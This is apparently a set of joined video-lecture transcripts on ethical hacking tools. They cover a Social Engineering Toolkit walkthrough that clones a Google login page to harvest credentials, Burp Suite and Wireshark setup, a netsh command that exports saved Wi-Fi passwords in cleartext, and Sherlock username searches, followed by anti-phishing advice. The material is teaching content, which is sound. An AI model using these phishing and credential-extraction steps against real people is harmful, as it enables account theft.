Hello friends, so just now we have seen the theoretical part of phishing attacks. So in the Kali Linux we are having a social engineering toolkit, so where we can use these phishing attacks. So let us open the Kali Linux, and here go to the applications, and here at the last bottom you will be finding the 13th one, that is a social engineering tools, and here you can see the social engineering toolkit, SE toolkit. So click on that one. So it will prompt for the password, just give the password, and see, you will be finding a lot of attacks here. So one is a social engineering attack, penetration testing, third party modules, etc, etc. So you can go with the first one, that is a social engineering attacks. So you type 1 and press enter, and in that social engineering attacks we can have a lot of attacks here. So a lot of attacks, see, spear phishing, website attacks, infectious media generator, create a payload and listener, mass mailer attack, Arduino based attack vector, etc, etc. So go with the website attack. So we'll see the website attack in this session, right? So type 2 and press enter, and in that website attack, that can be done with the help of a lot of methods. So by using the Java applet attack, Metasploit browser, credential harvester, tab nabbing, webjacking. So for all these kind of methods, you will be having the theoretical part here. You can observe here, see, Java applet attack method, Metasploit browser exploit, credential harvester, etc, etc. So we'll go with the credential harvester method, so which will utilize the web cloning of a website that has a username and password field and harvest all the information posted to the website. So by using this credential harvester, as it was mentioned, the complete website will be cloned to the legitimate website, and it will prompt for the username and password. Whenever the victim enters the username and password in the given fields, automatically that will be trapped by the attacker, right? So we'll see the credential harvester attack method. So just type 3, press enter, and see, and that can be done in 3 ways. One is the web templates. We can use the available templates, or we can clone our own website which is having the username and password fields, right? And the third one is a custom import. So we'll use the templates, already available templates. So I will type 1 and press enter. Here we need to give one IP address, so that to that particular IP address it will be cloned. I'll give this one, 192.168.71.130. So here there are 3 templates. One is a Java required, another one is a Google, another one is a Twitter. So these are already available templates. So we are not doing anything. So just we are using the available templates. And before using that, just one thing I just want to say. So this is only for the educational purpose. So don't try on your personal revenges, right? So just learn what exactly the phishing attacks and what exactly the attacks being done, how the attacks being done, right? So don't take or don't make use for your personal revenges, right? Yes. So we can use the one among these 3 templates. One is a Java required template, another one is a Google template, another one is a Twitter template. So obviously we'll go with the Google template because we all know about this google.com, how the page will be look like, right? So just go with the second template, select a template. So I'll select 2, Google. So see, you can observe the message, cloning the website www.google.com. So the best way to use this attack is if username and password from form fields are available, regardless this captures all the POS TS on the website. So already you can observe, already the website has been cloned to the given IP address. So previously we have given some IP address, right? So to that particular IP address, the www.google.com has been cloned, and directly we can make use of that particular template. See, now what we have done. So we'll see the visual link and active link. Okay, so I will open the notepad. So I'll write a simple HTML code, HTML, and I'll write a body, and here I'll go with the anchor tag AH reference is equal to HTTPS, and instead of giving google.com, I'll give 192.168.71.130. so this is the IP address which we have given for cloning, right? So here I'll give Google and anchor tag, right? See, body and HTML. So usually we'll get the mails, we'll get a mail receiving this type of links that like your account has been suspended. So in order to resume your account, please do your eKYC or relog into your website, right? Click on this link to click on this link to update your KYC, etc., etc. will be getting the emails, right? So there the actual link, this is the actual link, will be completely different from the visual link. So usually the visual link is Google, and if you click on this Google, it should be redirected to the google.com. So but here instead of giving google.com, I am giving our own IP address, right? So I'm saving this one. Excuse me. So I'll write some google.html. So you can observe here, you can observe google.html. So just click on this one, and here you can find the link, because we have not given anything else except this link. So click on this link, automatically it will be redirected to the Google page, okay, which was cloned to this particular address. No, just a second. We'll change we'll remove the secure, and this one, see, you got the Google, right? See, so complete similar, okay. So hope you understood. Actually this is not the google.com, okay, this is not a google.com, this is a cloned website from the google.com, and we'll not observe the address in the address bar, the URL in the address bar. So simply we'll see the visible content, and we'll see, yes, this is a original website, this is a genuine website. So obviously we'll give some ABCDEF at some gmail.com, and we'll give some password, our own passwords, right? And click on sign in. Automatically it will redirect, and nothing happens here, So once you go to the attacker system, you can observe the complete data has been recorded here, abcdef at gmail.com, and this is the password which you have entered into the password field. So whatever the data we are giving on the fields, that will be recorded by the attacker system, right? So this is how the phishing attacks will be done. So we should be very careful while clicking on the links which we received on the emails, and if you are clicking the link, just observe the address bar, the URL, so actual URL to which the page has been redirected, right? So this is how it will be happens, the phishing attacks will be happen. And see, once again we'll see, once again I'll repeat with one more template. So go with the third option, credential harvester. So I will use templates, and give the IP address to which it should be cloned, 168.78 some 130. And see, now I'll go with the first one, Java required, and that particular Java required. So this is also a frequent page we'll receive while visiting the websites. So frequently we'll get the message that Java should be updated. It requires some Java to be updated. Please install the Java, etc., etc. We'll be receiving, right? So like that. See, now let us check 192.168 130. Now, so this is the Java required page. Java required page. So this is a clone to this particular website now. Okay, previously the google.com has been cloned. Now the Java required template has been cloned. So here you can observe. So Java latest update. Just go with the search. So nothing happens, but everything will be recorded here. So you can observe here. See, Java latest update. So we have entered this in the website which was shown in the attacker system. Right? So this is how the phishing websites will be done. So the attackers will create a malicious links, and the attacker will send these malicious link to the victims through the mails or the messages. So once the victim clicks on the link which was sent by the attacker, automatically if the page will be redirected to the cloned website, the malicious website, and there if you enter any sort of data, so that will be recorded by the attacker. Right? So hope you understood, and once again I'm repeating, this is only for the educational purpose, and don't make use of it for your personal revenge. So in today's session we'll discuss about one more interesting tool in Kali Linux, that is a Burp suite. See, this Burp suite is used for penetration testing like web applications, right? In order to test the web applications, we'll use this Burp suite. So many of the ethical hackers will use this Burp suite as a testing of web applications. And this Burp suite operates as a web proxy between the browser and the target application. So that means if you consider any web application, obviously will interact with the web through the browser itself, right? And this Burp suite will act as a mediator in between the browser and the server. So that we call it as a proxy, right? It will be acting as a proxy server. So Burp suite comes installed by default on Kali Linux. So you need not install this Burp suite externally in the Kali Linux. So once you install this Kali Linux, automatically this Burp suite will be available. So I'll show you that one. So this Burp suite will act as a proxy in between a client and server. So obviously coming to the web application, the client will send a request and the server give a response. So for this one, for understanding this Burp suite, I will give a simple example. So I'm having my system and I will open the browser and I will use, see, I'll open a browser and I'm going with the youtube.com /c/Sundeep Saradhi. This is the URL of our YouTube channel. So obviously so I think it's a small c and Sundeep Saradhi. Yes. So this is our YouTube channel. So this is our YouTube channel. So this was the page requested from our system. So the client and the server, that means whatever the server maintained in the YouTube, that server, from that server, this particular page will be loaded into our browser, right? So through browser, we are interacting with the server. So what is the request here? We are requesting some web page. And what is the response from the server? From the server, we are getting the page of our YouTube channel, right? For example, if you go with the flipkart.com or amazon.com or any other websites, right? So the URL which we are giving in the browser is a client request. So it will move on to the server, and from that server we are getting the home page, right? So loading the home page is a response from the server. So in between this client and server, this Burp suite will be acting as a proxy. So whatever the packets sending from client to server, that will be redirected through the Burp suite. Okay, so through the Burp suite, the packets will be moved from client to server. So in order to check this one, so let us take this YouTube example. So first we need to configure the Burp suite to a browser. Okay, in the browser settings, we have to configure the burp suite. So for that, you need an IP address as well as a port number. Okay, so usually all the web applications will be having the port number 8080. And coming to the IP address, we need to give the unique IP address which was not in use. Obviously, there is a loopback IP address where the hackers will use is a 127.0.1, and we'll use the same IP address, and we need to download the certificate, CA certificates, right? Certificate authority that will be coming from certificate authority that will authenticate the particular tool to the browser. So unless you authenticate the tool to a browser, the pages will not be redirected. So for that one, we are having an option called intercept in the burp suite tool. So we need to make that burp suite, that intercept on and off. So if the intercept is on, the tool is in a working state, and if the intercept is off, the tool will be in a not working state. So now let us see the understanding of burp suite, working of burp suite, right? See, first we need to configure the browser to the burp suite, right? See, and before understanding, so one thing I just want to say, whatever the concepts we are discussing in our channel, so that is completely for the education purpose. Please don't apply these things for your personal revenges. Okay, just for an education purpose. So let us understand about the burp suite. First, we need to configure this burp suite to the browser. So let us move on to the Kali Linux. So I'll log into the Kali Linux. Now go to the applications. So on the left top, you will be finding the applications. Click on that one. So in the search, you can find out the burp suite. Type BURP. So you'll getting the tool burp suite. So click on this one. So the tool will be opened here. See, the tool is open. Click on OK. Yes, here you can give the project name and all these things. Otherwise, simply go with the temporary project and click on next and start the burp. So automatically the tool will be opened. See, here the tool is open, and here you can see the tabs, dashboard, target, proxy, intruder, repeater, sequence, decoder, compare, logger, extender, etc, etc. So in that, go to the proxy, and here you can find the intercept off and on. So here we need to bypass the packets coming from client to server and server to client. So intercept is off. That means the tool is in off state. Now the tool is not in a working state. So in order to make this tool working, first we need to configure the burp suite to the browser. So go to the browser. I'll go with the browser. I will open the browser and open the settings. Here you will be finding the settings. See, find the settings and open the network settings. So just type network settings. So you can go with the network settings. So here use a system proxy settings. By default it will be selected. So go with the manual proxy configuration, and here give the IP address, the loopback IP address 127.0.0.1, and as these are the web applications, give the port number 8080, and check this one. Also use these proxies for HTTPS. So this is a HTTP proxy and a secure protocol, right? HTTPS is a secure protocol. So also use the same IP for the HTTPS and just click on OK. So now open the burp. So HTTPS or HTTP : type BURP, enter. So you can find the CA certificate of this particular burp suite. CA certificate on the rightmost top corner. CA certificate, right? So this is a certificate given by the certificate authority to authenticate this tool. So now we have to configure this certificate into the browser so that the browser will configure, this burp suite tool will be authenticated by the browser, then only the bypass will be accepted. So click on CS certificate here. So save that one, save. So once it was done, just close the browser, and again in the settings now use a view certificates, go with a view. So here you will be finding the view certificates, click on the view certificate. So here you will be having all the different certificates, okay, for the trusted. So go to the import and then select the certificate which was downloaded just now. So this is the certificate CACERT.DER and open. So yes, already I have done this certificate authority, I have installed the certificate authority. So that's why I got this message that this certificate is already installed as a certificate authority. So once you've done that, so you'll be getting the two checkboxes regarding the trusting the tools. So you need to select the two checkboxes which will trust the tool, right? So once you've done that, automatically the configuration is done. Configuration is completed. So I have completed that one. So that's why I got the message already installed. The certificate is already installed. So if you are doing the first time, you will be getting the two checkboxes with a trustee. So you need to check both the text boxes and click OK. So once it was done, automatically the Burp suite is configured to your website and the certificate is also given to the Burp suite. Now see, just in order to understand the browser and this one, I'll give this browser and the Burp suite as a two parts so that you will be understanding what's the working. So usually it was off, right? Intercept is off. So as we have discussed, if the intercept is off, what means the tool is not working state. The tool is not in working state. That means obviously if you send the link, see, I'll go with the yes. So I'm opening a video. Yeah, we'll go with this one because that is explained in a PPT, so you'll not be understanding that one. So we'll go with this one. Yes. So now the YouTube, I'm playing a video in the YouTube of ours. See, the video is being played, right? A normal flow. So this is a browser. So it was already sending packets to the server, and the server is sending the response to the client, so that the video is playing here. Now I will just turn on this intercept. I will turn on the intercept. Now what happens? So this Burp suite will be acting as a mediator in between the browser and the target application, so that whatever the packets sending from client to server will be sent through this Burp suite. See, once it was done, you can observe just a second. So already the thing was buffered, right? See, now what you observe, so it was in a buffering state because so till now the packets was received, but whenever we have opened this intercept on, the packets were not sent, right? So here it was interrupted. Now the packets are at the Burp suite tool. So if you click on this forward, then only the packets will be sent to the server path by path. And see, once again, so a lot of time is completed, but still it was in buffering. So whenever I turn off this intercept, so you can observe again the video will be start playing, and again if you turn on the intercept, again see automatically within that per fraction of seconds it was buffered. So up to this part the video will be played, and after this part the video will not be played. You can observe here, see a small bit, you can observe here. Yes, all the buffer has been done. Now still again buffering, that means the packets were not receiving. Okay, so again if I turn off the intercept, again it will start buffering. See, so hope you understood this one, the working of Burp suite tool. So the working means, so the Burp suite will be acting as a proxy between the browser and the server, right? So here I am giving the complete information how we have to configure the Burp suite tool to the browser, right? So open the browser, click on more options, select the settings, type the network settings, change the settings to the manual proxy configuration, HTTP proxy, give the loopback IP and a port number, select the checkbox and click on OK, and open a new tab and download the CA certificate and configure the certificate to the browser. And now just open the Burp suite tool, go to the proxy tab, turn off the intercept off, and open the browser, play the video in YouTube. So there will be no buffering, automatically it will play continuously. Now turn on the intercept in the proxy tab, observe the video on the YouTube, the video will not be played until you turn off the intercept, right? So that's why we call this Burp suite as a penetration testing tool for a web applications, right? So hope you understood this Burp suite tool, and if you are having any doubts regarding this one, feel free to post your doubts in the comment section. Definitely I will try to clarify all your doubts. And
in today's session we'll discuss about how to download an installation of one more tool which the hackers use, is a Wireshark tool. Wireshark tool. So Wireshark tool is a packet sniffing tool, right? So it's also called as a packet sniffing. So in our previous sessions we have discussed about this packets. So the packets are nothing but the data which are being transmitted from one system to another system over a network. So during the transmission, if you want to analyze the packets or a data which is being transmitted, so this particular tool will be used. So captures packets, or it will be, this tool is used to capture data or information which is being transmitted in a unsecure network. This is very important. Unsecure network. So if the network is unsecure and if the system is unsecure, then whatever the data which is being transmitted, so that can be captured. So here the data is nothing but our packets, and this is essential tool for the hackers. Essential tool used by ethical hackers. And this is also used for troubleshooting, right? So mainly when I'm saying it as a packets, so we have discussed this in the previous session about these packets. So the packet will be having a data, the source address, destination address, and the sequence number, and the length of the packet, and the timestamp, and the protocol which the packet will be processed, and everything we can observe in this Wireshark tool. And this will be available as a pre-installed tool in our Kali Linux. And if you are using some Windows operating system, then we can download this Wireshark and we can install and we can use it. So this is also called as a multi-platform tool. Multi-platform tool. So this can be downloaded in both the Linux operating system as well as in the Windows operating system. So if you are using the Kali Linux, that will be pre-installed tool. So in Windows operating system, we need to install and we need to use this Wireshark tool, right? So capturing the packets is the main goal. So that's why we call it as a packet sniffing tool. So this is a packet sniffing tool, right? So now we'll move on to our system. So we'll see the how the packets can be analyzed in Wireshark tool. So we'll see in both the environments, that means in the Kali Linux as well as in the Windows operating system, right? So let's move on to the system.
Hello friends, so just now we have seen the features of Wireshark tool, and now we'll see in the Kali Linux how the Wireshark tool can be used in the Kali Linux, and how can we download and install the Wireshark tool in Windows operating system. And there is no need to download and install this Wireshark tool in the Kali Linux because it will be available as a pre-installed tool, so we can make use of that tool, right? So just go to the applications, which is on the top left corner. So here you can find the applications, click on that one, and in search you can search for the Wireshark. So you will be finding the tool. So just click on the tool. So this is a tool available. So as we said, now this tool is used to capture the packets which are available in the network, that means which are being transmitted from one system to another system over a network. So the packets which are being transmitted through the Bluetooth or Ethernet or any wireless, anything, okay, that can be captured. So here if you select any, so all the packets which are being transmitted in any type of network can be captured, right? So just click on this any, and the first option here you can find the blue color, right? So that is a start capturing packets. If you click on this one, it will start capturing the packets. So these packets includes the length, timestamp, the sequence number, okay, the length, so etc will be available. And if any packet has been lost, the retransmission also will be done, and the protocols which are transmitting these packets will also be displayed here, right? So once I'll just start capturing the packets. So here you will be finding nothing because we are not surfing any internet, right? So here you can find the packets. So here you can find the data, the number and the timestamp, and the source, the IP from which the packet has been transmitted, and destination to which the packet has been transmitted, and the protocol which is used, and the length of the packet. Similarly, the information like acknowledgement, the sequence number, the port numbers, so source port number and destination port number. So in our previous session we have discussed about the ports, right? So in order to get the message into our system, so that can also be done through ports, right, called a logical ports. So those port numbers can also be displayed here, everything. So in this part you will be finding the packet information, detailed information here, and in this partition you will be finding the hash code of the particular data, right? For security purpose, the hash code will be generated. So now we are not browsing, so nothing has been displayed here. So once you open the browser, it will start capturing the packets. See, so I have opened the browser and you can find the packets which are being transmitted. Now let us check what is the IP address, okay, IP address of the system. So go to the terminal, and here you can find ifconfig to know the IP address of the system. So this is the IP address of our system, 192.168.71.130. Just remember this IP address, 192.168.71 and 130. And here you can find, see 192.168.71.130. So this is the source. So this is the IP address. From this IP address we are sending the data to the destination. Here a lot of IP addresses are there, right? So see, we'll access the google.com. So google.com. Now what happens from our system, that means 192.168.71 and 130, the data will be sent to a google.com. that means a Google server, right? So from that Google server, some sort of data will be sent as a response to our browser. That means a login page will be loaded in our system. So that means some sort of data will be transmitted from our source, that means our browser or our system, to the Google server, and we are getting a response from Google server to our system. So now we'll see the IP address of this particular Google server, right? So how we can see? Just see. Go to the notepad. Go to the run, ping, give the URL. So you'll be finding the IP address 142.250.183.206, right? So here you can observe the packets has been transmitted from. So let us stop here. So we'll be finding the packets, right? So a lot of packets has been transmitted through different protocols. See, this is a Google 142.250.183 and 100, and here you can observe, see, a lot of packets. So just we have given the google.com, so a lot of packets has been transmitted from our source to destination, right? See, we'll check. See, a lot of information, and you can observe here the complete data there regarding this packets. You can see. So you can also filter that one. So I'll go with a TCP. So only the TCP packets will be displayed here. So you can observe. So this is also the data which has been sent from our system. So this is a source. So where is our source? Yes, this is our source, and I think so. This is the google.com IP. The google.com IP, right? So this is the packet which has been sent to there. So a lot of packets, okay, a lot of packets will be sent, and similarly we are going to receive the response. So you can observe here, this is a response we are getting from the packets, right? And for every packet you can see, so this is the information, complete information about that packet, right? And you can see the timestamp and the source IP address from which the packet has been transmitted, and the destination to which the packet has been given transmitted, and through which protocol it was being sent, and the length of the packet. So this is the length, right? So you can observe this is the length, and this is the information. So information means, so you can observe the source port and the destination port. So through which port address the data is being entered into your system, right? So similarly there will be some acknowledgement. If there is a lost in a packet, automatically the retransmission will also be done with the help of the TCP protocol, right? So if any packet has been lost, so you can find the retransmission. So now, so there is no loss of packet, so there is no retransmission, and if there is any retransmission, automatically we'll get here there is a retransmission of a packet, right? And this is a corresponding hash code, okay, corresponding hash code of this particular packet. So like this we can capture all the packets which are being transmitted from source to destination in the network. So using this one, so we can get any kind of information which are being transmitted in an unsecure network. So if you are sending the data through an unsecure network, the complete information you will get here, including the passwords, usernames, email, phone number, contacts, etc., etc. Everything can be captured here. So by using this tool, so that's why. So this is a very popular and essential tool which is being used by any ethical hacker, right? So this is a tool which we are using in the Kali Linux, which is a pre-installed. Now, if you are working here, so let us stop here. Yes, I have stopped. So if you are working in the Windows operating system, here also we will get the tool. We can download the tool. So here, just in the Google, you can go with the official website wireshark.org. So you'll be finding the download option. So here, just click on the download. So you'll be finding a different options here. Windows installer 64-bit, Windows portable apps, 64-bit, Mac OS, and a source code. So select your required operating system. Required installer. So I'll go with the Windows installer. Just click on this one. So it will automatically start downloading this particular tool. So I'll stop that one because already I have downloaded. So in our downloads, we'll be having the Wireshark tool, right? So just double click on this tool. So this tool will be getting installed in our Windows operating system. So yes, so see, so here we are installing the same. Yes, click on next. Yes, yes. So it will start installing the tool in our Windows operating system. So the environment will be same, so which we have seen in the Kali Linux. The user interface is same, right? So just wait until it completes its installation. So meanwhile, just subscribe our channel and like our sessions. So here you can observe the setup was completed successfully. Just click on the next and finish. So already the tool has been installed in our system. So just go to the one, type search, see Wireshark. So just click on this tool. So open. Sorry, I have opened the Windows Defender. So I'll go with the Wireshark. Yes. So already I have opened this Wireshark. So here the interface is same. You can observe here there is a lot of networks, Wi-Fi, local area connection, Bluetooth network connection, etc. etc. You can select any one of these one. So now we have connected our system with a Wi-Fi. So it was showing the data has been transmitting through Wi-Fi. So click on this one, select this Wi-Fi, and click on this one, start capturing the packets. So here you can see some sort of packets are being transmitted in the network, right? So here you can observe. So I'll use this one. So I'll go with google.com, right? So the packets has been sent here. So whatever the source, you can observe here, this is a source and this is a destination. So you can observe here the same thing. So source, destination, protocol, length, and this information. In the information you will be seeing the source IP, source port number, and destination port number. And here in this particular portion you can find the complete details in detail. So there is a drop down you can observe here. So just drop down, so you can find the source port number, destination port number, completeness, etc. etc. Acknowledgement, checksum whether it is in anything is required. So everything, sequence number, acknowledgement. So everything will be captured here, right? So here you can observe the one thing, that is a TCP transmission. So if any one of the packet has not been received, then automatically the TCP is responsible for retransmission, because it will use some error checking mechanism, right? So because of that, it will find out whether what are the packets which are not has been transmitted to the destination, and it will retransmit the packets. So this you can observe here, TCP retransmission. That means this particular packet has not been received from the destination, so the TCP was retransmitting the packet once again. And in this portion you can observe the hash code of the particular packet, right? So like this you can observe the complete information of the packets which are being transmitted in the network. So this is a Windows tool, and this is a tool which is used in a Kali Linux. So in today's session we'll discuss about how to get the Wi-Fi passwords using the command prompt. So usually in our laptop we may connect to different Wi-Fi's at different places, right? So in order to know the passwords of all those Wi-Fi usernames, so there is a one command we can use through the command prompt to get the passwords. See, we'll see right now. So I'm connecting to the Wi-Fi. So this is a Wi-Fi. I'm connecting to this Wi-Fi.
And now, so after that, just go to the command prompt, and remember, you have to open the command prompt in administrative mode. So that's why just search for command prompt. So you'll get this one, and here you can find the option run as administrator. So simply if you open the run command, and if you use here cmd, it won't be opened using the administrator, right? So just go with the search. Excuse me. So here you can find the option run as administrator. Click on this one, and after that type the command to get the profiles net sh wlan show profile. So this is the command to show the profiles of all the Wi-Fi usernames which you have connected earlier, right? See, these are all the different Wi-Fi usernames which my laptop, I have connected through my laptop, right, at different places. So in order to get the password of all these things, just use the same command netsh wlan. Instead of show profile, just export the profiles, export all the profiles to a folder in let it be C drive or D drive, your wish, and give key is equal to clear. So observe, this is the command, just note down. So netsh wlan export profile to a folder is equal to C drive. So all the profiles, that means these profiles, everything will be loaded in this particular C drive. Okay, so instead of C, I'll give a D, right? Enter. So you can observe, so everything was saved. See, interface profile IBM Lab is saved, interface profile D-Link is saved, CSC staff second DF is saved. So like this, everything has been saved in the folder D drive, right? Now just open the D drive in your system, and here you can find, see, all these are the Wi-Fi profiles. Okay, now you can see we have connected to the network called Kanthety. So you can observe here, see, this is the kanthety.xml. So one thing, just remember, all these files will be in XML format. So click on right click on this one, and open with Notepad or WordPad, whatever it may be. Okay, Notepad or WordPad. So you'll get the complete code, profile code, and here you can see authentication, encryptions, and shared key. So here you can observe the key material, which is nothing but a password of that particular username. So the Kanthety is a password for Kanthety username. And for one more thing I will show you. So let us search for one more profile, that is a Sundeep Saradhi, which is my mobile hotspot. See, this is Sundeep Saradhi. It's a mobile hotspot. So right click on that, open, and WordPad. So you can see the key material, the password to connect Sundeep Saradhi is 1 2 3 4 5 6 7 8. Right? This is a password. So like this, we can get the passwords of all the saved networks. So why I am calling as a saved networks means, so previously our system connects with a lot of user IDs in the different places. So in order to get the passwords of them, so we are using these two commands, right? So one is netsh wlan show profile, and netsh wlan export profile folder is equal to some, give the folder name, I mean which drive, in which drive you need to save, and key is equal to clear. So directly you can give this command, you need not go with this one. So in order to find what are the usernames previously we have connected, so we need to know that we have to go with this command. In order to get the profiles directly, use this single command. This is a single command, right? So hope you understood, and if you are having any trouble while performing this operation, so feel free to post your doubts in the comment section. Definitely I will try to clarify all your doubts. So in today's session, we'll see one more tool in Kali Linux that the ethical hackers will use, that is Sherlock tool. So this is an open source
and this tool is to find usernames from different social media networks, right? So we can find the username from different social media networks, and this tool will be having around 250 plus websites, and it will search for the given username, right? For example, if you have someone's username and want to know more about the username, just we can use this tool and it will show where this username is registered on the internet. That means it will from various social media networks, right? So this will be available in Python. So first let us open the Kali Linux and we have to install that, and from there we have to give a username, and then we'll get the websites in which the username has been registered, right? So I'll show you. And one more thing, so this is only for the educational purpose. Please don't try for your personal revenges, right? So you can use for penetration testing, right? So let us log into the Kali Linux, and here go to the command prompt. So go to the command prompt and first let us find out the Sherlock from the git. So just go with the Sherlock GitHub. So we'll find the first one. So click on the first link, so GitHub, and press on the code down arrow. So here you can get a copy link. So just copy this one, and now open the terminal in the Kali Linux, and here use a command git clone and copy the link. Press enter. Sorry, already exists. Let us check. Yes, already Sherlock is there. Just let me remove that one and I will show you once again, right? So Sherlock I have removed. Yes. So yes, now you can observe there is no folder with the Sherlock. Now let us clone that one from the GitHub. So cloning into Sherlock. So it will install the package, and after that we need to install the text, which is a requirement text, and this is the tool which will be used in the requirements gathering. So that means a recon phase. So in our previous sessions we have seen the life cycle of ethical hacking. In that, the first stage is a recon, that means footprinting or recon. So in order to gather the information, right? So this is one type of requirements gathering tool, right? Because if you are having a username, we are getting a lot of the websites or links from where this user ID has been registered, right? Now install Python 3 and pip install -r. So install this requirements .txt. So install this one, and from Python. Just a second. Requirements.txt. So let us move on to the Sherlock and let us install here. Yes, now you can use a command called Python 3 Sherlock -version, which give the version of this Sherlock tool. So here we are using the Sherlock tool 0.14.3, right, and Python 3.10.8 version. And again we can go with the help command. So $help, which gives all the commands which we can use. So among these I will show you some. So Python 3 Sherlock, and give the username here. So username, let us take any username. Okay, so I'll take the username computer. So it will start searching for the username computer which was registered among different websites in the social media. See, these are all the different websites. So it will search among around 300 websites, and it will find whether the given username has been registered or not. And here it will give the direct link. If you click on this link directly, it will open that particular website. Okay, see, and here you can see that there is some sort of delay. Okay, so here the time is infinity, so it will wait until it get response from that particular website. So that's why it is somewhat delay. We can also use one more option called timeout, where we have to specify the seconds. So it will wait for that particular seconds, and if the time beyond that particular seconds, automatically it will move on to the next website. So after this we will see the timeout. So it was taking a lot of time, so I'll terminate this one. So Control Z, it will stop, it will suspend. And now let us check. So Python 3 Sherlock --timeout. So timeout, that means we are giving some threshold with the number of seconds. I'll give 1 second, so it will wait for only 1 second. So if it is beyond 1 second, that means if it was taking more than 1 second to find out, so it will skip and it will go with the next one. So I'll go with the computer, the same thing, and see. So it will give, see, checking username computer on different websites. So you'll get the complete websites where the computer username has been registered, right? So in order to use multiple usernames, you need to check multiple usernames. Then also you can use the same. So by giving a space among different usernames, that means we can search for multiple usernames at a time, right? See, I'll suspend this one and see computer and Sundeep. So it will start searching, checking username computer on so and so. So after that it will check for Sundeep. See, it was just moving. So in an alphabetical order, you can observe here. So it will search in an alphabetical order and it will display all the links. Right? So I'll hold suspended, and now let us move on with the next one. See, print all. Print, so a timeout double hyphen print all. That means it will display all the websites where it has been registered or not registered. Okay, so I'll go with my name itself, Sundeep Saradhi. So very few will be there. See, it will give complete website list, and it will give whether it is found or not found. See, here it was found in this particular website, and it is found in this particular website, Kaggle, lead code, and see, it will search for all the websites. So there will be some sort of delay, don't worry. See, yes. So you are getting not found, not found. That means we have not registered in these particular websites, it seems, right? So we have registered only for few one. So only 14 results. That means where the 14 websites I have registered. Now in order to find only the registered websites, right? So print only found, give the username. So it will print only the websites where the Sundeep Saradhi user ID has been registered, right? See, we'll get all the links. So here we have not given, yes, so see, so freelancer, geeks for geeks, hacker rank, Kaggle, lead code. So we're getting all these things.
So in our previous sessions, we have discussed about what is a social engineering attack and what is the life cycle of social engineering attack, and also we have seen so different types of social engineering attacks, and particularly these social engineering attacks are we have experienced in this real world, right? So maximum, I hope everyone have experienced at least one social engineering attack. So in our previous session we have seen different types, human based social engineering attack and technology based social engineering attacks. So now in this session we'll see one more concept for this social engineering attacks, how to prevent. Okay, so how to not get affected by these social engineering attacks? So what are the preventive measures of social engineering attacks, right? So the first one, so be aware of unknown emails. So we have seen one type of social engineering attack, that is a phishing. So where we'll get malicious links, and because of a curiosity, if the user clicks on that link, the user will be redirected to the malicious websites. So where it will ask for the sensitive information, automatically the user will provide the information, right? So we should be very careful about the unknown emails. So nowadays we are receiving a lot of unwanted emails in our inbox. I think this you have been experienced, right? So don't open the unwanted emails. Don't open the emails which are coming from the unknown persons. And the second one, don't click on the unwanted links. This is also most important. So in the phishing, we have seen a different categories: email phishing, spear phishing, whaling, wishing, smishing. So through the voice calls or through the SMS, right? So you will be getting an SMS, right? So you have to update your KYC, otherwise your bank account will be got closed. So complete your KYC verification by clicking on this particular link within 1 day. So you'll get such type of messages. So with a curiosity or with a anxiety or with a less time, so we'll just click on that particular link and automatically we'll provide our information. So don't click on unwanted links. Once you confirm that message, and then you proceed with the links. So you can contact with your bank accounts, okay, bank manager or a bank branches. So you contact with them, and then only you just click on the link. So without knowing the persons or without knowing the background, don't open the unwanted links. And the next one, don't download the unknown files. So this is one type of Trojan horse, right? So we are downloading different files or different softwares from the internet. So we thought that it is a legitimate software or legitimate file, but we don't know that there was some sort of malicious code will be downloaded through that particular file. So don't download the unknown files, okay? And then this is the most important thing. So we need to educate the public. So many of them don't know about these type of social engineering attacks. So we should educate the public so that they'll be careful while without affecting by the social engineering attacks. So this is the most important. Educate the public regarding these social engineering attacks which are going on in this real world nowadays, right? And then this is also most important. Update your antivirus software. So we need to update regularly. Okay, we need to update regularly the antivirus software so that it can protect our system or our data, right? And then don't give the sensitive information in the public network. So this is the most important, because we all use these public networks, right? In the bus stands or railway stations or any other public places, we are supposed to use the Wi-Fi, okay, which they are providing, right? So don't use that public service provider, public networks. And even though if you are using the public, don't provide the sensitive information in that particular public network. So while sitting in the railway station or while sitting in the bus stand, so you can browse the internet, but don't give any sort of sensitive information. That means any kind of your information in that public network. That's the most important. And the thing that don't use the same password for a different accounts. So we'll be having a different accounts, right? So don't use the same password for all the different accounts. And also one more important thing, so keep on changing the password. So don't use the password for long days. So this we experience it with the banking applications. So if you are using any net banking, internet banking, so only up to some particular period the existing password will be used. So after some particular period it will prompt for change the password. So we should not use the same password for a long time. So we need to change the passwords, and also use a very complex passwords or a tough passwords. Don't use the simple passwords. Okay, so don't use the same password for the different accounts. So maintain different accounts and with the different passwords. And think twice before you click. So this is related to our second point. That means don't click on the unwanted links. So if you trust that this is a genuine link, so think twice, inquire with the particular authority, and then you click. So think twice before you click. So you'll be receiving a lot of links nowadays. So blindly don't click on that links and provide the information. Go with the background check and then you just proceed with the given link. And the next, use a multi-factor authentication. This is also most important. So for any account, there will be multi-factor authentications. So just make use of this process, this multi-factor authentication. Not only the password, it will also generate the OTP. If the OTP is perfect, then only you will be logging to the account. So such a way, just use the multi-factor authentication. And the next, verify email sender identity. Email sender identity. This is also most important while using the email phishing. So immediately after getting the mail, don't respond to that particular mail. Just verify the email from the sender. Okay, from which sender you are getting. Right? So one most probable thing is, so if you are a fresher, so you might be trapped by using this email phishings. So you might get an email from the companies. Okay, so just provide your personal information, sensitive information. So just for verification. Okay, and automatically being a fresher will be anxiety. Okay, we will be having some curiosity that we'll be getting an email from the company. So just for verification, so obviously we'll provide that. But before responding to any email, not only the company email, if it is even if it is a company email, or if it is related to the banking email, or if it is related to your college email, whatever it may be, just identify the email sender. So from where you are getting the email. So one thing you just remember, if you are getting any email from the companies regarding the recruitment, that email sender will be having the company email ID. It will not be coming from public email ID, right? So the sender email will be the complete company domain. Okay, once check that one, and then only you respond it. Okay, so don't respond blindly to the emails which you have received. And the next one, destroy the data after use. So in our preparation or in our regular daily work, we are supposed to write some contact numbers, some email IDs, some receipt numbers, etc., on the papers, etc., on your notepad, on system, etc., So once it was completed, just destroy that one. Because we have seen one type of attack in social engineering attack, that is dumpster diving. That means getting the information from the trash. Right? So just destroy everything after the use. So we should not disclose any kind of our information to the attacker. So we should not take a chance. Right? So these are some preventive measures of the social engineering attacks. So follow these things and don't get affected by these social engineering attacks. And one important thing, just educate the public regarding these social engineering attacks. Right? So I think many of them are not aware about the social engineering attacks. So educate the public. Okay, educate the public so that everyone will be safe. Right? So hope you understood. Let's stop here, and if you are having any doubts regarding this one, feel free to post your doubts in the comment section. Definitely we'll try to clarify all your doubts. And if you really enjoyed my session, like my session, share my session with 